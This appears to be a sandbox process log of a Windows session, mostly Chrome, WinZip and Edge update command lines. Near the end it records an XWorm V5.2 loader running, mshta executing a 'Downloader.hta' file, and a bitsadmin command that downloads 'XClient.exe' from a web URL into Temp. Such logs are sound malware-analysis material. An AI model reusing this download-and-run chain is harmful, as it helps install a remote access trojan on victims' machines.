"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5676 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5736 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5612 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=5188 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2260 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=3428 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4724 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4732 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4712 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2412 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Users\Admin\Downloads\winzip28-lan.exe

"C:\Users\Admin\Downloads\winzip28-lan.exe"

C:\Users\Admin\AppData\Local\Temp\e5f39b6\winzip28-lan.exe

run=1 shortcut="C:\Users\Admin\Downloads\winzip28-lan.exe"

C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe

"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /install

C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\Temp\EU46C6.tmp\MicrosoftEdgeUpdate.exe" /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntCMDdERDM0NC01N0FCLTQ4MTAtOEVDNC02MTRDQTI4RDU5NkZ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RHhPYmpIR2ErblJhMmF0QzN3bytJRXBDNzgrWlllQVVia1hwREMyY2o3VT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4NS4yOSIgbmV4dHZlcnNpb249IjEuMy4xODcuMzciIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk4MTIzODY5OTYiIGluc3RhbGxfdGltZV9tcz0iNTAwIi8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{8717535A-2A62-4463-8231-11A4E1E2494F}"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDlEODVGRUYtRDczNS00NTgxLTlGOEYtMzVGNDI2OUZFMDA2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0R4T2JqSEdhK25SYTJhdEMzd28rSUVwQzc4K1pZZUFVYmtYcERDMmNqN1U9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjExMC4wLjU0ODEuMTA0IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyMCIgaW5zdGFsbGRhdGV0aW1lPSIxNzE0MTM1OTIwIiBvb2JlX2luc3RhbGxfdGltZT0iMTMzNTg2MzM2ODk5ODcxMjcwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjExNDA2OCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTgxODI1NzAzNyIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=5900 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=5452 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=5700 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5824 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3200 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5624 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5300 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Users\Admin\Downloads\winzip28.exe

"C:\Users\Admin\Downloads\winzip28.exe"

C:\Users\Admin\AppData\Local\Temp\e60578a\winzip28.exe

run=1 shortcut="C:\Users\Admin\Downloads\winzip28.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=5392 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5528 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7ODcxNzUzNUEtMkE2Mi00NDYzLTgyMzEtMTFBNEUxRTI0OTRGfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGNjEwRUZCNi05MjIyLTQwRkYtOEZENS1EQTZGMkNGRTcwNjV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTI0LjAuMjQ3OC45NyIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9Ii0xIiBpbnN0YWxsZGF0ZT0iLTEiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iOTgzMTYwNjQ3MCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijk4MzE2MDY0NzAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iNCIgZXJyb3Jjb2RlPSItMjE0NzIxOTQ0MCIgZXh0cmFjb2RlMT0iMjY4NDM1NDYzIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDg4MjY5NzMxMiIgaXNfYnVuZGxlZD0iMCIgc3RhdGVfY2FuY2VsbGVkPSI3IiB0aW1lX3NpbmNlX3VwZGF0ZV9hdmFpbGFibGVfbXM9IjEwNTEwOSIgdGltZV9zaW5jZV9kb3dubG9hZF9zdGFydF9tcz0iMTA1MDc4Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcyMTk0NDAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwODgzMDQ3MjI3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuZi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy8zMjc5OThlMy00MTM0LTRlYjEtYThlZi0xYTY3N2ZlMGIyNTk_UDE9MTcxNjQ2OTgwOSZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1WWHNjbmpHQnB5UnZmJTJmdWdtZnJieFVCdGl3YkZqb3JPWkJoYzhYT0hhb09YaVI5eFlIdUw2M1YzNk9tenolMmI2aU9tSWNKQ0MlMmJkZFllaTZSSHNPT0NiZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjEyNzQ0MzY3OCIgdG90YWw9IjE3MjgyMTA2NCIgZG93bmxvYWRfdGltZV9tcz0iMTAwODc1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Windows\SysWOW64\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2028" "1156" "1028" "1152" "0" "0" "0" "0" "0" "0" "0" "0"

C:\Windows\SysWOW64\wermgr.exe

"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2536" "1144" "852" "1164" "0" "0" "0" "0" "0" "0" "0" "0"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 --field-trial-handle=1840,i,15716017089989806540,17746874652258276977,131072 /prefetch:8

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap8850:104:7zEvent30402

C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe

"C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f4 0x3b8

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{BFFC50DF-F311-4333-81BC-37376CAA023B}\BGAUpdate.exe" --edgeupdate-client --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\MicrosoftEdge_X64_124.0.2478.97.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{29B5A707-F657-4389-9DD8-69126B102B43}\EDGEMITMP_2EDE8.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.97 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff649a688c0,0x7ff649a688cc,0x7ff649a688d8

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzciIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MEIwNUNBQjctRTQ3RC00OTQxLUEzMTktRDQ1OUI5QTE4MUMxfSIgdXNlcmlkPSJ7RUJEMzlEM0MtNjBDRC00QjhELTk4MkUtNUZDNUU3QTg2MzYyfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntGMDI4NDM5Ny1ERDU5LTQ4NDQtOEJCNS0zQTRGMTQyNjQ4NER9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RDZqeFBlVW1LZmg4eXR5NkYwN1l4TTFlWkRIL1RWNkZRVDJmZkRpWnl3dz0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTI0LjAuMjQ3OC45NyIgbGFuZz0iIiBicmFuZD0iRVVXViIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEyODM4MzM1Mzg3IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTMyNzU5OTExMjgiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjA